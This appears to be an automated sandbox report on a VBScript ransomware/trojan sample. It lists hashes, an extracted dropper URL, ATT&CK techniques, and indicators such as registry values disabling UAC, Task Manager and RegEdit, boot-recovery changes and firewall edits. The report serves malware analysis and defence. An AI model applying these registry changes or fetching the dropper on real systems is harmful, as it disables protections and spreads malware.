c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f

Analysis

max time kernel
270s
max time network
204s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 17:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware.vbs
Size

7KB
MD5

6e0473af4fbc9223bb02c4cbbad2ae4e
SHA1

e710bf9f0dc329d34644f869d580eb378bf179ec
SHA256

c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f
SHA512

e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444
SSDEEP

96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z

Score

10^/10

discovery evasion execution exploit persistence ransomware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://bonzi.link/Bon.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bonzi.link/Bon.zip

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

3212 bcdedit.exe
1704 bcdedit.exe
5924 bcdedit.exe
6024 bcdedit.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

35 4984 powershell.exe
40 5008 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
3212	bcdedit.exe
1704	bcdedit.exe
5924	bcdedit.exe
6024	bcdedit.exe

flow	pid	process
35	4984	powershell.exe
40	5008	powershell.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 2 TTPs 10 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

3128 netsh.exe
5492 netsh.exe
5688 netsh.exe
5792 netsh.exe
5624 netsh.exe
4436 netsh.exe
3024 netsh.exe
4228 netsh.exe
3848 netsh.exe
5560 netsh.exe
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

5284 takeown.exe
5240 icacls.exe
1704 takeown.exe
3876 icacls.exe
1016 takeown.exe
5832 icacls.exe
5208 takeown.exe
5132 icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

1016 takeown.exe
5832 icacls.exe
5208 takeown.exe
5132 icacls.exe
5284 takeown.exe
5240 icacls.exe
1704 takeown.exe
3876 icacls.exe

pid	process
3128	netsh.exe
5492	netsh.exe
5688	netsh.exe
5792	netsh.exe
5624	netsh.exe
4436	netsh.exe
3024	netsh.exe
4228	netsh.exe
3848	netsh.exe
5560	netsh.exe

pid	process
5284	takeown.exe
5240	icacls.exe
1704	takeown.exe
3876	icacls.exe
1016	takeown.exe
5832	icacls.exe
5208	takeown.exe
5132	icacls.exe

pid	process
1016	takeown.exe
5832	icacls.exe
5208	takeown.exe
5132	icacls.exe
5284	takeown.exe
5240	icacls.exe
1704	takeown.exe
3876	icacls.exe

Drops file in System32 directory 19 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	OpenWith.exe

Drops file in Windows directory 1 IoCs

Processes:

netsh.exe

description ioc process

File created C:\Windows\rescache\_merged\431186354\3486321857.pri netsh.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

3876 sc.exe
6028 sc.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4984 powershell.exe
3136 powershell.exe
5008 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5644 timeout.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\431186354\3486321857.pri	netsh.exe

pid	process
3876	sc.exe
6028	sc.exe

pid	process
5644	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

4432 ipconfig.exe
5584 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5500 taskkill.exe
5444 taskkill.exe
5588 taskkill.exe

pid	process
4432	ipconfig.exe
5584	ipconfig.exe

pid	process
5500	taskkill.exe
5444	taskkill.exe
5588	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

cmd.exenetsh.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 010000000000000065b7250010aada01	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9002 = "BranchCache - Hosted Cache Server (Uses HTTPS)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5366dd4697d\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableGPO = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9001 = "BranchCache - Peer Discovery (Uses WSD)"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8\@{Microsoft.Win32WebViewHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms-reso = "Desktop App Web Viewer"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8\@{Microsoft.Windows.ContentDeliveryManager_10.0.19041.1023_neutral_ = "Microsoft Content"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36864 = "WLAN Service - WFD Application Services Platform Coordination Protocol (Uses UDP)"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36865 = "WLAN Service - WFD Services Kernel Mode Driver Rules"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 010000000000000027f13f0010aada01	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri	netsh.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4324 NOTEPAD.EXE
Runs net.exe

pid	process
4324	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
3136	powershell.exe
3136	powershell.exe
5008	powershell.exe
5008	powershell.exe
4020	msedge.exe
4020	msedge.exe
4128	msedge.exe
4128	msedge.exe
3084	identity_helper.exe
3084	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

4128 msedge.exe
4128 msedge.exe
4128 msedge.exe
4128 msedge.exe
4128 msedge.exe
4128 msedge.exe
4128 msedge.exe
4128 msedge.exe
4128 msedge.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeShutdownPrivilege	1368	powercfg.exe
Token: SeCreatePagefilePrivilege	1368	powercfg.exe
Token: SeShutdownPrivilege	4204	powercfg.exe
Token: SeCreatePagefilePrivilege	4204	powercfg.exe
Token: SeShutdownPrivilege	4452	powercfg.exe
Token: SeCreatePagefilePrivilege	4452	powercfg.exe
Token: SeShutdownPrivilege	4220	powercfg.exe
Token: SeCreatePagefilePrivilege	4220	powercfg.exe
Token: SeDebugPrivilege	1128	whoami.exe
Token: SeTakeOwnershipPrivilege	1704	takeown.exe
Token: SeShutdownPrivilege	5224	powercfg.exe
Token: SeCreatePagefilePrivilege	5224	powercfg.exe
Token: SeShutdownPrivilege	5272	powercfg.exe
Token: SeCreatePagefilePrivilege	5272	powercfg.exe
Token: SeShutdownPrivilege	5328	powercfg.exe
Token: SeCreatePagefilePrivilege	5328	powercfg.exe
Token: SeShutdownPrivilege	5440	powercfg.exe
Token: SeCreatePagefilePrivilege	5440	powercfg.exe
Token: SeDebugPrivilege	5716	whoami.exe
Token: SeTakeOwnershipPrivilege	1016	takeown.exe
Token: SeTakeOwnershipPrivilege	5208	takeown.exe
Token: SeTakeOwnershipPrivilege	5284	takeown.exe
Token: SeDebugPrivilege	5444	taskkill.exe
Token: SeDebugPrivilege	5588	taskkill.exe
Token: SeDebugPrivilege	5500	taskkill.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

pid process

5668 OpenWith.exe
5776 OpenWith.exe
1212 OpenWith.exe

pid	process
5668	OpenWith.exe
5776	OpenWith.exe
1212	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exenet.exe

description	pid	process	target process
PID 4352 wrote to memory of 4984	4352	cmd.exe	powershell.exe
PID 4352 wrote to memory of 4984	4352	cmd.exe	powershell.exe
PID 4352 wrote to memory of 3136	4352	cmd.exe	powershell.exe
PID 4352 wrote to memory of 3136	4352	cmd.exe	powershell.exe
PID 4352 wrote to memory of 5008	4352	cmd.exe	powershell.exe
PID 4352 wrote to memory of 5008	4352	cmd.exe	powershell.exe
PID 2176 wrote to memory of 3388	2176	cmd.exe	net.exe
PID 2176 wrote to memory of 3388	2176	cmd.exe	net.exe
PID 3388 wrote to memory of 4476	3388	net.exe	net1.exe
PID 3388 wrote to memory of 4476	3388	net.exe	net1.exe
PID 2176 wrote to memory of 1368	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 1368	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4204	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4204	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4452	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4452	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4220	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4220	2176	cmd.exe	powercfg.exe
PID 2176 wrote to memory of 4436	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 4436	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 3128	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 3128	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 3024	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 3024	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 4228	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 4228	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 3848	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 3848	2176	cmd.exe	netsh.exe
PID 2176 wrote to memory of 4852	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4852	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 1708	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 1708	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 988	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 988	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 5088	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 5088	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 868	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 868	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4632	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4632	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 1484	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 1484	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4892	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4892	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4400	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4400	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4840	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4840	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 2864	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 2864	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3656	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3656	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4940	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4940	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3460	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3460	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3960	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3960	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 2236	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 2236	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3244	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3244	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4708	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 4708	2176	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
1⤵
PID:3576

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2932

C:\Windows\System32\NOTEPAD.EXE
